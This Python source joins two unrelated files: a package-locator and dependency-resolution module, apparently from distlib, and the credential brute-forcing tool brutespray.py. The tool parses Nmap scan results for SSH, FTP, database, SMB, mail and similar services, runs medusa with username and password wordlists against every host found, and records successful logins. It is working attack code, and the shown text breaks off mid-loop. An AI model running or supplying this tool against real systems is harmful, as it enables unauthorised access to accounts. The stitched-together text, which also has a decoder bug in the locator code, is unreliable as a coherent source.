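    #   <a href="foo-1.0.tar.gz" rel="download">foo-1.0.tar.gz</a>
    #   <a rel='homepage' href='https://example.org/foo'>home</a>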
def __init__(self, data, url):
"""
Initialise an instance with the Unicode page contents and the URL they
came from.
"""
self.data = data
self.base_url = self.url = url
m = self._base.search(self.data)
if m:
self.base_url = m.group(1)
_clean_re = re.compile(r"[^a-z0-9$&+,/:;=?@.#%_\\|-]", re.I)
@cached_property
def links(self):
"""
Return the URLs of all the links on a page together with information
about their "rel" attribute, for determining which ones to treat as
downloads and which ones to queue for further scraping.
"""
def clean(url):
"Tidy up an URL."
scheme, netloc, path, params, query, frag = urlparse(url)
return urlunparse((scheme, netloc, quote(path), params, query, frag))
result = set()
for match in self._href.finditer(self.data):
d = match.groupdict("")
rel = (
d["rel1"]
or d["rel2"]
or d["rel3"]
or d["rel4"]
or d["rel5"]
or d["rel6"]
)
url = d["url1"] or d["url2"] or d["url3"]
url = urljoin(self.base_url, url)
url = unescape(url)
url = self._clean_re.sub(lambda m: "%%%2x" % ord(m.group(0)), url)
result.add((url, rel))
# We sort the result, hoping to bring the most recent versions
# to the front
result = sorted(result, key=lambda t: t[0], reverse=True)
return result
class SimpleScrapingLocator(Locator):
"""
A locator which scrapes HTML pages to locate downloads for a distribution.
This runs multiple threads to do the I/O; performance is at least as good
as pip's PackageFinder, which works in an analogous fashion.
"""
# These are used to deal with various Content-Encoding schemes.
decoders = {
"deflate": zlib.decompress,
"gzip": lambda b: gzip.GzipFile(fileobj=BytesIO(d)).read(),
"none": lambda b: b,
}
def __init__(self, url, timeout=None, num_workers=10, **kwargs):
"""
Initialise an instance.
:param url: The root URL to use for scraping.
:param timeout: The timeout, in seconds, to be applied to requests.
This defaults to ``None`` (no timeout specified).
:param num_workers: The number of worker threads you want to do I/O.
This defaults to 10.
:param kwargs: Passed to the superclass.
"""
super(SimpleScrapingLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
self.timeout = timeout
self._page_cache = {}
self._seen = set()
self._to_fetch = queue.Queue()
self._bad_hosts = set()
self.skip_externals = False
self.num_workers = num_workers
self._lock = threading.RLock()
# See issue #45: we need to be resilient when the locator is used
# in a thread, e.g. with concurrent.futures. We can't use self._lock
# as it is for coordinating our internal threads - the ones created
# in _prepare_threads.
self._gplock = threading.RLock()
self.platform_check = False # See issue #112
def _prepare_threads(self):
"""
Threads are created only when get_project is called, and terminate
before it returns. They are there primarily to parallelise I/O (i.e.
fetching web pages).
"""
self._threads = []
for i in range(self.num_workers):
t = threading.Thread(target=self._fetch)
t.setDaemon(True)
t.start()
self._threads.append(t)
def _wait_threads(self):
"""
Tell all the threads to terminate (by sending a sentinel value) and
wait for them to do so.
"""
# Note that you need two loops, since you can't say which
# thread will get each sentinel
for t in self._threads:
self._to_fetch.put(None) # sentinel
for t in self._threads:
t.join()
self._threads = []
def _get_project(self, name):
result = {"urls": {}, "digests": {}}
with self._gplock:
self.result = result
self.project_name = name
url = urljoin(self.base_url, "%s/" % quote(name))
self._seen.clear()
self._page_cache.clear()
self._prepare_threads()
try:
logger.debug("Queueing %s", url)
self._to_fetch.put(url)
self._to_fetch.join()
finally:
self._wait_threads()
del self.result
return result
platform_dependent = re.compile(
r"\b(linux_(i\d86|x86_64|arm\w+)|" r"win(32|_amd64)|macosx_?\d+)\b", re.I
)
def _is_platform_dependent(self, url):
"""
Does an URL refer to a platform-specific download?
"""
return self.platform_dependent.search(url)
def _process_download(self, url):
"""
See if an URL is a suitable download for a project.
If it is, register information in the result dictionary (for
_get_project) about the specific version it's for.
Note that the return value isn't actually used other than as a boolean
value.
"""
if self.platform_check and self._is_platform_dependent(url):
info = None
else:
info = self.convert_url_to_download_info(url, self.project_name)
logger.debug("process_download: %s -> %s", url, info)
if info:
with self._lock: # needed because self.result is shared
self._update_version_data(self.result, info)
return info
def _should_queue(self, link, referrer, rel):
"""
Determine whether a link URL from a referring page and with a
particular "rel" attribute should be queued for scraping.
"""
scheme, netloc, path, _, _, _ = urlparse(link)
if path.endswith(
self.source_extensions + self.binary_extensions + self.excluded_extensions
):
result = False
elif self.skip_externals and not link.startswith(self.base_url):
result = False
elif not referrer.startswith(self.base_url):
result = False
elif rel not in ("homepage", "download"):
result = False
elif scheme not in ("http", "https", "ftp"):
result = False
elif self._is_platform_dependent(link):
result = False
else:
host = netloc.split(":", 1)[0]
if host.lower() == "localhost":
result = False
else:
result = True
logger.debug("should_queue: %s (%s) from %s -> %s", link, rel, referrer, result)
return result
def _fetch(self):
"""
Get a URL to fetch from the work queue, get the HTML page, examine its
links for download candidates and candidates for further scraping.
This is a handy method to run in a thread.
"""
while True:
url = self._to_fetch.get()
try:
if url:
page = self.get_page(url)
if page is None: # e.g. after an error
continue
for link, rel in page.links:
if link not in self._seen:
try:
self._seen.add(link)
if not self._process_download(
link
) and self._should_queue(link, url, rel):
logger.debug("Queueing %s from %s", link, url)
self._to_fetch.put(link)
except MetadataInvalidError: # e.g. invalid versions
pass
except Exception as e: # pragma: no cover
self.errors.put(text_type(e))
finally:
# always do this, to avoid hangs :-)
self._to_fetch.task_done()
if not url:
# logger.debug('Sentinel seen, quitting.')
break
def get_page(self, url):
"""
Get the HTML for an URL, possibly from an in-memory cache.
XXX TODO Note: this cache is never actually cleared. It's assumed that
the data won't get stale over the lifetime of a locator instance (not
necessarily true for the default_locator).
"""
# http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
scheme, netloc, path, _, _, _ = urlparse(url)
if scheme == "file" and os.path.isdir(url2pathname(path)):
url = urljoin(ensure_slash(url), "index.html")
if url in self._page_cache:
result = self._page_cache[url]
logger.debug("Returning %s from cache: %s", url, result)
else:
host = netloc.split(":", 1)[0]
result = None
if host in self._bad_hosts:
logger.debug("Skipping %s due to bad host %s", url, host)
else:
req = Request(url, headers={"Accept-encoding": "identity"})
try:
logger.debug("Fetching %s", url)
resp = self.opener.open(req, timeout=self.timeout)
logger.debug("Fetched %s", url)
headers = resp.info()
content_type = headers.get("Content-Type", "")
if HTML_CONTENT_TYPE.match(content_type):
final_url = resp.geturl()
data = resp.read()
encoding = headers.get("Content-Encoding")
if encoding:
decoder = self.decoders[encoding] # fail if not found
data = decoder(data)
encoding = "utf-8"
m = CHARSET.search(content_type)
if m:
encoding = m.group(1)
try:
data = data.decode(encoding)
except UnicodeError: # pragma: no cover
data = data.decode("latin-1") # fallback
result = Page(data, final_url)
self._page_cache[final_url] = result
except HTTPError as e:
if e.code != 404:
logger.exception("Fetch failed: %s: %s", url, e)
except URLError as e: # pragma: no cover
logger.exception("Fetch failed: %s: %s", url, e)
with self._lock:
self._bad_hosts.add(host)
except Exception as e: # pragma: no cover
logger.exception("Fetch failed: %s: %s", url, e)
finally:
self._page_cache[url] = result # even if None (failure)
return result
_distname_re = re.compile("<a href=[^>]*>([^<]+)<")
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
page = self.get_page(self.base_url)
if not page:
raise DistlibException("Unable to get %s" % self.base_url)
for match in self._distname_re.finditer(page.data):
result.add(match.group(1))
return result
class DirectoryLocator(Locator):
"""
This class locates distributions in a directory tree.
"""
def __init__(self, path, **kwargs):
"""
Initialise an instance.
:param path: The root of the directory tree to search.
:param kwargs: Passed to the superclass constructor,
except for:
* recursive - if True (the default), subdirectories are
recursed into. If False, only the top-level directory
is searched.
"""
self.recursive = kwargs.pop("recursive", True)
super(DirectoryLocator, self).__init__(**kwargs)
path = os.path.abspath(path)
if not os.path.isdir(path): # pragma: no cover
raise DistlibException("Not a directory: %r" % path)
self.base_dir = path
def should_include(self, filename, parent):
"""
Should a filename be considered as a candidate for a distribution
archive? As well as the filename, the directory which contains it
is provided, though not used by the current implementation.
"""
return filename.endswith(self.downloadable_extensions)
def _get_project(self, name):
result = {"urls": {}, "digests": {}}
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(
("file", "", pathname2url(os.path.abspath(fn)), "", "", "")
)
info = self.convert_url_to_download_info(url, name)
if info:
self._update_version_data(result, info)
if not self.recursive:
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(
("file", "", pathname2url(os.path.abspath(fn)), "", "", "")
)
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info["name"])
if not self.recursive:
break
return result
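# Illustrative usage (the directory path is hypothetical):
#   locator = DirectoryLocator('/path/to/downloads', recursive=False)
#   print(locator.get_project('foo'))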
class JSONLocator(Locator):
"""
This locator uses special extended metadata (not available on PyPI) and is
the basis of performant dependency resolution in distlib. Other locators
require archive downloads before dependencies can be determined! As you
might imagine, that can be slow.
"""
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError("Not available from this locator")
def _get_project(self, name):
result = {"urls": {}, "digests": {}}
data = get_project_data(name)
if data:
for info in data.get("files", []):
if info["ptype"] != "sdist" or info["pyversion"] != "source":
continue
# We don't store summary in project metadata as it makes
# the data bigger for no benefit during dependency
# resolution
dist = make_dist(
data["name"],
info["version"],
summary=data.get("summary", "Placeholder for summary"),
scheme=self.scheme,
)
md = dist.metadata
md.source_url = info["url"]
# TODO SHA256 digest
if "digest" in info and info["digest"]:
dist.digest = ("md5", info["digest"])
md.dependencies = info.get("requirements", {})
dist.exports = info.get("exports", {})
result[dist.version] = dist
result["urls"].setdefault(dist.version, set()).add(info["url"])
return result
class DistPathLocator(Locator):
"""
This locator finds installed distributions in a path. It can be useful for
adding to an :class:`AggregatingLocator`.
"""
def __init__(self, distpath, **kwargs):
"""
Initialise an instance.
:param distpath: A :class:`DistributionPath` instance to search.
"""
super(DistPathLocator, self).__init__(**kwargs)
assert isinstance(distpath, DistributionPath)
self.distpath = distpath
def _get_project(self, name):
dist = self.distpath.get_distribution(name)
if dist is None:
result = {"urls": {}, "digests": {}}
else:
result = {
dist.version: dist,
"urls": {dist.version: set([dist.source_url])},
"digests": {dist.version: set([None])},
}
return result
class AggregatingLocator(Locator):
"""
This class allows you to chain and/or merge a list of locators.
"""
def __init__(self, *locators, **kwargs):
"""
Initialise an instance.
:param locators: The list of locators to search.
:param kwargs: Passed to the superclass constructor,
except for:
* merge - if False (the default), the first successful
search from any of the locators is returned. If True,
the results from all locators are merged (this can be
slow).
"""
self.merge = kwargs.pop("merge", False)
self.locators = locators
super(AggregatingLocator, self).__init__(**kwargs)
def clear_cache(self):
super(AggregatingLocator, self).clear_cache()
for locator in self.locators:
locator.clear_cache()
def _set_scheme(self, value):
self._scheme = value
for locator in self.locators:
locator.scheme = value
scheme = property(Locator.scheme.fget, _set_scheme)
def _get_project(self, name):
result = {}
for locator in self.locators:
d = locator.get_project(name)
if d:
if self.merge:
files = result.get("urls", {})
digests = result.get("digests", {})
# next line could overwrite result['urls'], result['digests']
result.update(d)
df = result.get("urls")
if files and df:
for k, v in files.items():
if k in df:
df[k] |= v
else:
df[k] = v
dd = result.get("digests")
if digests and dd:
dd.update(digests)
else:
# See issue #18. If any dists are found and we're looking
# for specific constraints, we only return something if
# a match is found. For example, if a DirectoryLocator
# returns just foo (1.0) while we're looking for
# foo (>= 2.0), we'll pretend there was nothing there so
# that subsequent locators can be queried. Otherwise we
# would just return foo (1.0) which would then lead to a
# failure to find foo (>= 2.0), because other locators
# weren't searched. Note that this only matters when
# merge=False.
if self.matcher is None:
found = True
else:
found = False
for k in d:
if self.matcher.match(k):
found = True
break
if found:
result = d
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for locator in self.locators:
try:
result |= locator.get_distribution_names()
except NotImplementedError:
pass
return result
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
default_locator = AggregatingLocator(
JSONLocator(),
SimpleScrapingLocator("https://pypi.org/simple/", timeout=3.0),
scheme="legacy",
)
locate = default_locator.locate
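# Illustrative usage (network access required; results depend on the index):
#   dist = locate('requests (>= 2.0)')
#   if dist is not None:
#       print(dist.name_and_version, dist.source_url)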
NAME_VERSION_RE = re.compile(r"(?P<name>[\w-]+)\s*" r"\(\s*(==\s*)?(?P<ver>[^)]+)\)$")
class DependencyFinder(object):
"""
Locate dependencies for distributions.
"""
def __init__(self, locator=None):
"""
Initialise an instance, using the specified locator
to locate distributions.
"""
self.locator = locator or default_locator
self.scheme = get_scheme(self.locator.scheme)
def add_distribution(self, dist):
"""
Add a distribution to the finder. This will update internal information
about who provides what.
:param dist: The distribution to add.
"""
logger.debug("adding distribution %s", dist)
name = dist.key
self.dists_by_name[name] = dist
self.dists[(name, dist.version)] = dist
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug("Add to provided: %s, %s, %s", name, version, dist)
self.provided.setdefault(name, set()).add((version, dist))
def remove_distribution(self, dist):
"""
Remove a distribution from the finder. This will update internal
information about who provides what.
:param dist: The distribution to remove.
"""
logger.debug("removing distribution %s", dist)
name = dist.key
del self.dists_by_name[name]
del self.dists[(name, dist.version)]
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug("Remove from provided: %s, %s, %s", name, version, dist)
s = self.provided[name]
s.remove((version, dist))
if not s:
del self.provided[name]
def get_matcher(self, reqt):
"""
Get a version matcher for a requirement.
:param reqt: The requirement
:type reqt: str
:return: A version matcher (an instance of
:class:`distlib.version.Matcher`).
"""
try:
matcher = self.scheme.matcher(reqt)
except UnsupportedVersionError: # pragma: no cover
# XXX compat-mode if cannot read the version
name = reqt.split()[0]
matcher = self.scheme.matcher(name)
return matcher
def find_providers(self, reqt):
"""
Find the distributions which can fulfill a requirement.
:param reqt: The requirement.
:type reqt: str
:return: A set of distribution which can fulfill the requirement.
"""
matcher = self.get_matcher(reqt)
name = matcher.key # case-insensitive
result = set()
provided = self.provided
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
result.add(provider)
break
return result
def try_to_replace(self, provider, other, problems):
"""
Attempt to replace one provider with another. This is typically used
when resolving dependencies from multiple sources, e.g. A requires
(B >= 1.0) while C requires (B >= 1.1).
For successful replacement, ``provider`` must meet all the requirements
which ``other`` fulfills.
:param provider: The provider we are trying to replace with.
:param other: The provider we're trying to replace.
:param problems: If False is returned, this will contain what
problems prevented replacement. This is currently
a tuple of the literal string 'cantreplace',
``provider``, ``other`` and the set of requirements
that ``provider`` couldn't fulfill.
:return: True if we can replace ``other`` with ``provider``, else
False.
"""
rlist = self.reqts[other]
unmatched = set()
for s in rlist:
matcher = self.get_matcher(s)
if not matcher.match(provider.version):
unmatched.add(s)
if unmatched:
# can't replace other with provider
problems.add(("cantreplace", provider, other, frozenset(unmatched)))
result = False
else:
# can replace other with provider
self.remove_distribution(other)
del self.reqts[other]
for s in rlist:
self.reqts.setdefault(provider, set()).add(s)
self.add_distribution(provider)
result = True
return result
def find(self, requirement, meta_extras=None, prereleases=False):
"""
Find a distribution and all distributions it depends on.
:param requirement: The requirement specifying the distribution to
find, or a Distribution instance.
:param meta_extras: A list of meta extras such as :test:, :build: and
so on.
:param prereleases: If ``True``, allow pre-release versions to be
returned - otherwise, don't return prereleases
unless they're all that's available.
Return a set of :class:`Distribution` instances and a set of
problems.
The distributions returned should be such that they have the
:attr:`required` attribute set to ``True`` if they were
from the ``requirement`` passed to ``find()``, and they have the
:attr:`build_time_dependency` attribute set to ``True`` unless they
are post-installation dependencies of the ``requirement``.
The problems should be a tuple consisting of the string
``'unsatisfied'`` and the requirement which couldn't be satisfied
by any distribution known to the locator.
"""
self.provided = {}
self.dists = {}
self.dists_by_name = {}
self.reqts = {}
meta_extras = set(meta_extras or [])
if ":*:" in meta_extras:
meta_extras.remove(":*:")
# :meta: and :run: are implicitly included
meta_extras |= set([":test:", ":build:", ":dev:"])
if isinstance(requirement, Distribution):
dist = odist = requirement
logger.debug("passed %s as requirement", odist)
else:
dist = odist = self.locator.locate(requirement, prereleases=prereleases)
if dist is None:
raise DistlibException("Unable to locate %r" % requirement)
logger.debug("located %s", odist)
dist.requested = True
problems = set()
todo = set([dist])
install_dists = set([odist])
while todo:
dist = todo.pop()
name = dist.key # case-insensitive
if name not in self.dists_by_name:
self.add_distribution(dist)
else:
# import pdb; pdb.set_trace()
other = self.dists_by_name[name]
if other != dist:
self.try_to_replace(dist, other, problems)
ireqts = dist.run_requires | dist.meta_requires
sreqts = dist.build_requires
ereqts = set()
if meta_extras and dist in install_dists:
for key in ("test", "build", "dev"):
e = ":%s:" % key
if e in meta_extras:
ereqts |= getattr(dist, "%s_requires" % key)
all_reqts = ireqts | sreqts | ereqts
for r in all_reqts:
providers = self.find_providers(r)
if not providers:
logger.debug("No providers found for %r", r)
provider = self.locator.locate(r, prereleases=prereleases)
# If no provider is found and we didn't consider
# prereleases, consider them now.
if provider is None and not prereleases:
provider = self.locator.locate(r, prereleases=True)
if provider is None:
logger.debug("Cannot satisfy %r", r)
problems.add(("unsatisfied", r))
else:
n, v = provider.key, provider.version
if (n, v) not in self.dists:
todo.add(provider)
providers.add(provider)
if r in ireqts and dist in install_dists:
install_dists.add(provider)
logger.debug(
"Adding %s to install_dists", provider.name_and_version
)
for p in providers:
name = p.key
if name not in self.dists_by_name:
self.reqts.setdefault(p, set()).add(r)
else:
other = self.dists_by_name[name]
if other != p:
# see if other can be replaced by p
self.try_to_replace(p, other, problems)
dists = set(self.dists.values())
for dist in dists:
dist.build_time_dependency = dist not in install_dists
if dist.build_time_dependency:
logger.debug(
"%s is a build-time dependency only.", dist.name_and_version
)
logger.debug("find done for %s", odist)
return dists, problems
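# Illustrative usage of DependencyFinder (network access required; results
# depend on the index):
#   finder = DependencyFinder()
#   dists, problems = finder.find('requests (>= 2.0)')
#   for problem in problems:
#       print('problem:', problem)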
|
brutespray.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from argparse import RawTextHelpFormatter
import readline, glob
import sys, time, os
import subprocess
import xml.dom.minidom
import re
import argparse
import argcomplete
import threading
import itertools
import tempfile
import shutil
from multiprocessing import Process
services = {}
loading = False
class colors:
white = "\033[1;37m"
normal = "\033[0;00m"
red = "\033[1;31m"
blue = "\033[1;34m"
green = "\033[1;32m"
lightblue = "\033[0;34m"
banner = colors.red + r"""
#@ @/
@@@ @@@
%@@@ @@@.
@@@@@ @@@@%
@@@@@ @@@@@
@@@@@@@ @ @@@@@@@
@(@@@@@@@% @@@@@@@ &@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@
@@@( @@@@@#@@@@@@@@@*@@@,@@@@@@@@@@@@@@@ @@@
@@@@@@ .@@@/@@@@@@@@@@@@@/@@@@ @@@@@@
@@@ @@@@@@@@@@@ @@@
@@@@* ,@@@@@@@@@( ,@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@.@@@@@@@@@@@@@@@ @@@
@@@@@@ @@@@@ @@@@@@
@@@@@@@@@@@@@
@@ @@@ @@
@@ @@@@@@@ @@
@@% @ @@
"""+'\n' \
+ r"""
██████╗ ██████╗ ██╗ ██╗████████╗███████╗███████╗██████╗ ██████╗ █████╗ ██╗ ██╗
██╔══██╗██╔══██╗██║ ██║╚══██╔══╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔══██╗╚██╗ ██╔╝
██████╔╝██████╔╝██║ ██║ ██║ █████╗ ███████╗██████╔╝██████╔╝███████║ ╚████╔╝
██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝ ╚════██║██╔═══╝ ██╔══██╗██╔══██║ ╚██╔╝
██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗███████║██║ ██║ ██║██║ ██║ ██║
╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝
"""+'\n' \
+ '\n brutespray.py v1.6.4' \
+ '\n Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail' \
+ '\n Inspired by: Leon Johnson/@sho-luv' \
+ '\n Credit to Medusa: JoMo-Kun / Foofus Networks <jmk@foofus.net>\n' + colors.normal
#ascii art by: Cara Pearson
class tabCompleter(object):
def pathCompleter(self,text,state):
line = readline.get_line_buffer().split()
return [x for x in glob.glob(text+'*')][state]
def interactive():
t = tabCompleter()
singluser = ""
if args.interactive is True:
print (colors.white + "\n\nWelcome to interactive mode!\n\n" + colors.normal)
print (colors.red + "WARNING:" + colors.white + " Leaving an option blank will leave it empty and refer to default\n\n" + colors.normal)
print ("Available services to brute-force:")
for serv in services:
srv = serv
for prt in services[serv]:
iplist = services[serv][prt]
port = prt
plist = len(iplist)
print ("Service: " + colors.green + str(serv) + colors.normal + " on port " + colors.red + str(port) + colors.normal + " with " + colors.red + str(plist) + colors.normal + " hosts")
args.service = raw_input('\n' + colors.lightblue + 'Enter services you want to brute - default all (ssh,ftp,etc): ' + colors.red)
args.threads = raw_input(colors.lightblue + 'Enter the number of parallel threads (default is 2): ' + colors.red)
args.hosts = raw_input(colors.lightblue + 'Enter the number of parallel hosts to scan per service (default is 1): ' + colors.red)
if args.passlist is None or args.userlist is None:
customword = raw_input(colors.lightblue + 'Would you like to specify a wordlist? (y/n): ' + colors.red)
if customword == "y":
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.pathCompleter)
if args.userlist is None and args.username is None:
args.userlist = raw_input(colors.lightblue + 'Enter a userlist you would like to use: ' + colors.red)
if args.userlist == "":
args.userlist = None
if args.passlist is None and args.password is None:
args.passlist = raw_input(colors.lightblue + 'Enter a passlist you would like to use: ' + colors.red)
if args.passlist == "":
args.passlist = None
if args.username is None or args.password is None:
            singluser = raw_input(colors.lightblue + 'Would you like to specify a single username or password (y/n): ' + colors.red)
if singluser == "y":
if args.username is None and args.userlist is None:
args.username = raw_input(colors.lightblue + 'Enter a username: ' + colors.red)
if args.username == "":
args.username = None
if args.password is None and args.passlist is None:
args.password = raw_input(colors.lightblue + 'Enter a password: ' + colors.red)
if args.password == "":
args.password = None
if args.service == "":
args.service = "all"
if args.threads == "":
args.threads = "2"
if args.hosts == "":
args.hosts = "1"
print colors.normal
NAME_MAP = {"ms-sql-s": "mssql",
"microsoft-ds": "smbnt",
"pcanywheredata": "pcanywhere",
"postgresql": "postgres",
"shell": "rsh",
"exec": "rexec",
"login": "rlogin",
"smtps": "smtp",
"submission": "smtp",
"imaps": "imap",
"pop3s": "pop3",
"iss-realsecure": "vmauthd",
"snmptrap": "snmp"}
def make_dic_gnmap():
global loading
global services
supported = ['ssh','ftp','postgres','telnet','mysql','ms-sql-s','shell',
'vnc','imap','imaps','nntp','pcanywheredata','pop3','pop3s',
'exec','login','microsoft-ds','smtp', 'smtps','submission',
'svn','iss-realsecure','snmptrap','snmp']
port = None
with open(args.file, 'r') as nmap_file:
for line in nmap_file:
for name in supported:
matches = re.compile(r'([0-9][0-9]*)/open/[a-z][a-z]*//' + name)
try:
port = matches.findall(line)[0]
except:
continue
ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', line)
tmp_ports = matches.findall(line)
for tmp_port in tmp_ports:
name = NAME_MAP.get(name, name)
if name in services:
if tmp_port in services[name]:
services[name][tmp_port] += ip
else:
services[name][tmp_port] = ip
else:
services[name] = {tmp_port:ip}
loading = True
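# Illustrative example (not in the original script): for a .gnmap line such as
#   Host: 192.168.1.5 ()  Ports: 22/open/tcp//ssh//OpenSSH 7.2/, 3306/open/tcp//mysql//
# make_dic_gnmap() leaves the shared dictionary looking roughly like
#   services == {'ssh': {'22': ['192.168.1.5']}, 'mysql': {'3306': ['192.168.1.5']}}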
def make_dic_xml():
global loading
global services
supported = ['ssh','ftp','postgresql','telnet','mysql','ms-sql-s','rsh',
'vnc','imap','imaps','nntp','pcanywheredata','pop3','pop3s',
'exec','login','microsoft-ds','smtp','smtps','submission',
'svn','iss-realsecure','snmptrap','snmp']
doc = xml.dom.minidom.parse(args.file)
for host in doc.getElementsByTagName("host"):
try:
address = host.getElementsByTagName("address")[0]
ip = address.getAttribute("addr")
eip = ip.encode("utf8")
iplist = eip.split(',')
except:
# move to the next host
continue
try:
status = host.getElementsByTagName("status")[0]
state = status.getAttribute("state")
except:
state = ""
try:
ports = host.getElementsByTagName("ports")[0]
ports = ports.getElementsByTagName("port")
except:
continue
for port in ports:
pn = port.getAttribute("portid")
state_el = port.getElementsByTagName("state")[0]
state = state_el.getAttribute("state")
if state == "open":
try:
service = port.getElementsByTagName("service")[0]
port_name = service.getAttribute("name")
except:
service = ""
port_name = ""
product_descr = ""
product_ver = ""
product_extra = ""
name = port_name.encode("utf-8")
tmp_port = pn.encode("utf-8")
if name in supported:
name = NAME_MAP.get(name, name)
if name in services:
if tmp_port in services[name]:
services[name][tmp_port] += iplist
else:
services[name][tmp_port] = iplist
else:
services[name] = {tmp_port:iplist}
loading = True
def brute(service,port,fname,output):
if args.userlist is None and args.username is None:
userlist = 'wordlist/'+service+'/user'
uarg = '-U'
elif args.userlist:
userlist = args.userlist
uarg = '-U'
elif args.username:
userlist = args.username
uarg = '-u'
if args.passlist is None and args.password is None:
passlist = 'wordlist/'+service+'/password'
parg = '-P'
elif args.passlist:
passlist = args.passlist
parg = '-P'
elif args.password:
passlist = args.password
parg = '-p'
if args.continuous:
cont = ''
else:
cont = '-F'
if service == "smtp":
aarg = "-m"
auth = "AUTH:LOGIN"
else:
aarg = ''
auth = ''
p = subprocess.Popen(['medusa', '-b', '-H', fname, uarg, userlist, parg, passlist, '-M', service, '-t', args.threads, '-n', port, '-T', args.hosts, cont, aarg, auth], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=-1)
out = "[" + colors.green + "+" + colors.normal + "] "
output_file = output + '/' + port + '-' + service + '-success.txt'
for line in iter(p.stdout.readline, b''):
print line,
sys.stdout.flush()
time.sleep(0.0001)
if 'SUCCESS' in line:
f = open(output_file, 'a')
f.write(out + line)
f.close()
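# Illustrative only: with the defaults above, brute('ssh', '22', fname, output)
# spawns roughly
#   medusa -b -H <tmp ip file> -U wordlist/ssh/user -P wordlist/ssh/password -M ssh -t 2 -n 22 -T 1 -F
# and any output line containing 'SUCCESS' is appended to <output>/22-ssh-success.txt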
def animate():
sys.stdout.write('\rStarting to brute, please make sure to use the right amount of ' + colors.green + 'threads(-t)' + colors.normal + ' and ' + colors.green + 'parallel hosts(-T)' + colors.normal + '... \n')
t_end = time.time() + 2
for c in itertools.cycle(['|', '/', '-', '\\']):
if not time.time() < t_end:
break
sys.stdout.write('\rOutput will be written to the folder: ./' + colors.green + args.output + colors.normal + "/ "+ c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\n\nBrute-Forcing... \n')
time.sleep(1)
def loading():
    # this spinner stops once the module-level "loading" flag is rebound to True
    # by make_dic_gnmap()/make_dic_xml(); the function name shadows that flag until then
    for c in itertools.cycle(['|', '/', '-', '\\']):
        if loading == True:
break
sys.stdout.write('\rLoading File: ' + c)
sys.stdout.flush()
time.sleep(0.01)
def parse_args():
parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, description=\
"Usage: python brutespray.py <OPTIONS> \n")
menu_group = parser.add_argument_group(colors.lightblue + 'Menu Options' + colors.normal)
menu_group.add_argument('-f', '--file', help="GNMAP or XML file to parse", required=False, default=None)
menu_group.add_argument('-o', '--output', help="Directory containing successful attempts", default="brutespray-output")
menu_group.add_argument('-s', '--service', help="specify service to attack", default="all")
menu_group.add_argument('-t', '--threads', help="number of medusa threads", default="2")
menu_group.add_argument('-T', '--hosts', help="number of hosts to test concurrently", default="1")
menu_group.add_argument('-U', '--userlist', help="reference a custom username file", default=None)
menu_group.add_argument('-P', '--passlist', help="reference a custom password file", default=None)
menu_group.add_argument('-u', '--username', help="specify a single username", default=None)
menu_group.add_argument('-p', '--password', help="specify a single password", default=None)
menu_group.add_argument('-c', '--continuous', help="keep brute-forcing after success", default=False, action='store_true')
menu_group.add_argument('-i', '--interactive', help="interactive mode", default=False, action='store_true')
menu_group.add_argument('-m', '--modules', help="dump a list of available modules to brute", default=False, action='store_true')
argcomplete.autocomplete(parser)
args = parser.parse_args()
if args.file is None and args.modules is False:
parser.error("argument -f/--file is required")
return args
if __name__ == "__main__":
print(banner)
args = parse_args()
supported = ['ssh','ftp','telnet','vnc','mssql','mysql','postgresql','rsh',
'imap','nntp','pcanywhere','pop3',
'rexec','rlogin','smbnt','smtp',
'svn','vmauthd','snmp']
#temporary directory for ip addresses
if args.modules is True:
print (colors.lightblue + "Supported Services:\n" + colors.green)
print ('\n'.join(supported))
print (colors.normal + "\n" )
try:
tmppath = tempfile.mkdtemp(prefix="brutespray-tmp")
except:
sys.stderr.write("\nError while creating brutespray temp directory.")
exit(4)
if not os.path.exists(args.output):
os.mkdir(args.output)
if os.system("command -v medusa > /dev/null") != 0:
sys.stderr.write("Command medusa not found. Please install medusa before using brutespray")
exit(3)
if args.file is None:
sys.exit(0)
if args.passlist and not os.path.isfile(args.passlist):
sys.stderr.write("Passlist given does not exist. Please check your file or path\n")
exit(3)
if args.userlist and not os.path.isfile(args.userlist):
sys.stderr.write("Userlist given does not exist. Please check your file or path\n")
exit(3)
if os.path.isfile(args.file):
try:
t = threading.Thread(target=loading)
t.start()
doc = xml.dom.minidom.parse(args.file)
make_dic_xml()
except:
make_dic_gnmap()
if args.interactive is True:
interactive()
animate()
if services == {}:
print ("\nNo brutable services found.\n Please check your Nmap file.")
else:
print ("\nError loading file, please check your filename.")
to_scan = args.service.split(',')
for service in services:
if service in to_scan or to_scan == ['all']:
for port in services[service]:
fname = tmppath + '/' +service + '-' + port
